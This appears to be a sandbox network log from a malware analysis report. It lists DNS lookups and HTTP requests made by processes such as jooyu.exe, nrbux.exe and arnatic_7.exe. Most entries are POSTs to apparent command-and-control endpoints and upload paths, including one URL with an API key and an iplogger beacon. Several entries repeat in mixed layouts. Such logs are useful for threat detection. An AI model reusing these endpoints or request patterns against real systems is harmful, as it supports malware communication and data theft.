    Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    X-Frame-Options: SAMEORIGIN
    cf-request-id: 0b07b5a8650000736ff6ab8000000001
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=ifPHsgqYOUgaxFVuRee%2BWcd2cI67erCLc1y3XRQB2%2F5C0wO7CAgGm0l9i0Poy9iliVLoZHeNZUUh9aLUzqFYEn69%2FP%2FZqqsXLOvLofAoFqpE8Xi3BIffjCnyAhNnHg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 66862553d9a0736f-CPH
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• flag-unknown
  POST http://iw.gamegame.info/report7.4.php
  SystemNetworkService
  Remote address: 104.21.21.221:80
  Request
    POST /report7.4.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Host: iw.gamegame.info
    Content-Length: 398
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 403 Forbidden
    Date: Fri, 02 Jul 2021 07:26:36 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    CF-Chl-Bypass: 1
    Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    X-Frame-Options: SAMEORIGIN
    cf-request-id: 0b07b5d28a0000fa686f319000000001
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=8u3RH176T3Y4uT0UE9wA78BCBBN6NDn8v%2B5WnWVTCFmbuswQtorl43qopxZVXvt6EoEt4EpPFX60%2FeGeFVu7%2BteJMY2HO%2FBS2exFHxc8ZT6fY05R1PA%2F%2BcGW33QX2A%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 668625974d86fa68-AMS
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• flag-unknown
  POST http://iw.gamegame.info/report7.4.php
  SystemNetworkService
  Remote address: 104.21.21.221:80
  Request
    POST /report7.4.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Host: iw.gamegame.info
    Content-Length: 398
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 403 Forbidden
    Date: Fri, 02 Jul 2021 07:26:47 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    CF-Chl-Bypass: 1
    Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    X-Frame-Options: SAMEORIGIN
    cf-request-id: 0b07b5fbe70000d8f12a238000000001
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=yHVfooORu3z%2FtJuA7CuDgwAAhGt5ja12SmiaseOwIk94v6YPdKdjSa4u4qOMp0fwbW%2FGw82lOFZNfMMcBwofOGsxMz1zeEyLR986ahrTijqACuVLMJ5w2g4c8QYQ%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 668625d97ee8d8f1-AMS
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• flag-unknown
  POST http://185.215.113.55/t5BnOoke2/index.php
  nrbux.exe
  Remote address: 185.215.113.55:80
  Request
    POST /t5BnOoke2/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.55
    Content-Length: 84
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Date: Fri, 02 Jul 2021 07:26:53 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 6
    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:26:57 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b6257300001bbd17af4000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=dicm%2BntykyRksBFJnYcbA8d97kjkEe5SqkTRf4LgWhPvB0IW1ftIqnlzN97LbF8De94niKoGuhaVwdsSTNVBq8jH4YgxfeD4KDd8%2BdMTz2c8e6XBxrqkTw%2F9bxjX0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686261beb521bbd-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:27:08 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b64f38000001151039b000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=T%2FNdPx0Mwe0Tr67ZfHJn05I3fsx6tRpMAqKahhacvGb%2FaYQPEIurSjdDF0JYKcw6RHssiQ%2FYVwCjdu1HInpFlrWyCoE8zkSyKz%2F7EUH%2BH7KefjD0HZxe%2FwNs2a4%2FVw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686265eca900115-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        star-mini.c10r.facebook.com
                                                                                                                                                                                        star-mini.c10r.facebook.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        157.240.201.35
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://www.facebook.com/
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.240.201.35:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET / HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        viewport-width: 1920
                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                        Sec-Fetch-User: ?1
                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                        Host: www.facebook.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Alt-Svc: h2="facebook2futmrduts5uqn3ahwg4qyqoks6h3alxf5drhsgyhzujyqad.onion:443"; ma=86400
                                                                                                                                                                                        x-fb-rlafr: 0
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                                                                                                        Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                        Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                        X-FB-Debug: MaVE6nvP8rRmABZACd0oaEelxT3PKJpKoZzJRylcUpwI22WNhGHLAz83tnlsf9aPKZc1y2zS53rRh9hl3X1thw==
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:27:19 GMT
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 398
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:27:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07b6779c00001649c8151000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=ZOkYBywmUImDjPCqZQonu65auMFv%2Fvup5ArJeVueQztwXCP%2BcLNtABK0OfHxBXhJqo%2FmbROarf5aBUNWHEZPA7ePUf3JhMx1GRjEYtPXbpdp%2BpIGeD1voG2D%2Fopyww%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6686269f6b4e1649-MUC
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

GET http://uyg5wye.2ihsfa.com/api/fbtime
Process: jooyu.exe
Remote address: 88.218.92.148:80
Request
GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: uyg5wye.2ihsfa.com
Response
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Jul 2021 07:27:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.21

POST http://uyg5wye.2ihsfa.com/api/?sid=294941&key=932c845d57a1c057ea8918c49d9c66f3
Process: jooyu.exe
Remote address: 88.218.92.148:80
Request
POST /api/?sid=294941&key=932c845d57a1c057ea8918c49d9c66f3 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uyg5wye.2ihsfa.com
Response
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Jul 2021 07:27:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.21

GET https://iplogger.org/18hh57
Process: jooyu.exe
Remote address: 88.99.66.31:443
Request
GET /18hh57 HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Host: iplogger.org
Response
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Jul 2021 07:27:21 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=snhtmh2qamjn9gq3g49ho9kti4; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=185.220.100.250; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253837350; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 5bd0344d526f94fa91bccbdc276a5eb28683c99000fe0344320eae785ca59dd0
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY

POST http://iw.gamegame.info/report7.4.php
Process: SystemNetworkService
Remote address: 104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 398
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:27:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07b69f8d0000415010866000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=FYWCdW6j7JQj51CflgtRX2Jns9m4h%2FGjr4VVhh7Frm1Fh5z5%2FGtBgKiukmC9S%2BK1c7rKgvireHH0DC2%2FJIRyT3N19cnRBgvPLNsZdIZGTNyjuWXU2DwIN2gXrz6RPQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 668626df48604150-HAM
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

DNS lahuertasonora.com
Process: chrome.exe
Remote address: 8.8.8.8:53
Request
lahuertasonora.com IN A
Response
lahuertasonora.com IN A 90.191.200.51
lahuertasonora.com IN A 116.126.116.6
lahuertasonora.com IN A 118.33.109.122
lahuertasonora.com IN A 190.146.154.18
lahuertasonora.com IN A 211.108.106.8
lahuertasonora.com IN A 116.58.10.58
lahuertasonora.com IN A 115.91.207.131
lahuertasonora.com IN A 118.130.34.112
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        190.190.202.13
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        210.207.244.101
• DNS  lahuertasonora.com  (chrome.exe)
  Remote address: 8.8.8.8:53
  Request
      lahuertasonora.com  IN A
  Response
      lahuertasonora.com  IN A  210.207.244.101
      lahuertasonora.com  IN A  90.191.200.51
      lahuertasonora.com  IN A  116.126.116.6
      lahuertasonora.com  IN A  118.33.109.122
      lahuertasonora.com  IN A  190.146.154.18
      lahuertasonora.com  IN A  211.108.106.8
      lahuertasonora.com  IN A  116.58.10.58
      lahuertasonora.com  IN A  115.91.207.131
      lahuertasonora.com  IN A  118.130.34.112
      lahuertasonora.com  IN A  190.190.202.13
• POST  http://lahuertasonora.com/upload/
  Remote address: 90.191.200.51:80
  Request
      POST /upload/ HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      Accept: */*
      Referer: http://lahuertasonora.com/upload/
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
      Content-Length: 299
      Host: lahuertasonora.com
  Response
      HTTP/1.0 404 Not Found
      Date: Fri, 02 Jul 2021 07:27:30 GMT
      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
      X-Powered-By: PHP/5.6.40
      Content-Length: 7
      Connection: close
      Content-Type: text/html; charset=utf-8
• POST  http://lahuertasonora.com/upload/
  Remote address: 90.191.200.51:80
  Request
      POST /upload/ HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      Accept: */*
      Referer: http://lahuertasonora.com/upload/
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
      Content-Length: 164
      Host: lahuertasonora.com
  Response
      HTTP/1.1 200 OK
      Date: Fri, 02 Jul 2021 07:27:30 GMT
      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
      X-Powered-By: PHP/5.6.40
      Content-Length: 0
      Connection: close
      Content-Type: text/html; charset=utf-8
• POST  http://87.251.71.195:82/  (arnatic_7.exe)
  Remote address: 87.251.71.195:82
  Request
      POST / HTTP/1.1
      Content-Type: text/xml; charset=utf-8
      SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
      Host: 87.251.71.195:82
      Content-Length: 137
      Expect: 100-continue
      Accept-Encoding: gzip, deflate
      Connection: Keep-Alive
• POST  http://87.251.71.195:82/  (arnatic_7.exe)
  Remote address: 87.251.71.195:82
  Request
      POST / HTTP/1.1
      Content-Type: text/xml; charset=utf-8
      SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
      Host: 87.251.71.195:82
      Content-Length: 137
      Expect: 100-continue
      Accept-Encoding: gzip, deflate
      Connection: Keep-Alive
• POST  http://iw.gamegame.info/report7.4.php  (SystemNetworkService)
  Remote address: 104.21.21.221:80
  Request
      POST /report7.4.php HTTP/1.1
      Accept: */*
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
      Host: iw.gamegame.info
      Content-Length: 398
      Connection: Keep-Alive
      Cache-Control: no-cache
  Response
      HTTP/1.1 403 Forbidden
      Date: Fri, 02 Jul 2021 07:27:39 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      CF-Chl-Bypass: 1
      Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
      Expires: Thu, 01 Jan 1970 00:00:01 GMT
      X-Frame-Options: SAMEORIGIN
      cf-request-id: 0b07b6c7ad0000fa1c3fa43000000001
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=j13MtJtpGynDm0OmZMza01mmBtVhbVXrUHiojn2X59D1IVTTdtw2%2BOdDAJnmFJvf%2BveS0JdQHonrMD1iXNUPMkzLcBAO3phgmG8I9JnjBswGySQeJdLLrlZsiUcMIA%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 6686271f7a38fa1c-AMS
      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:27:49 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b6efb900001bd52612a000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=NCVVfglB%2FXsQDV2gf4vbebPZvtJg%2BsHMAIwJjPmSOuibsBHlckPVpGFPXvJixYsFiA2RAkqrQYxc6miI%2Bz2X5lotDGlQWHWjXHxmdgpZaZW8cpUFM07eVv8vTbVt1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686275f8a9c1bd5-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
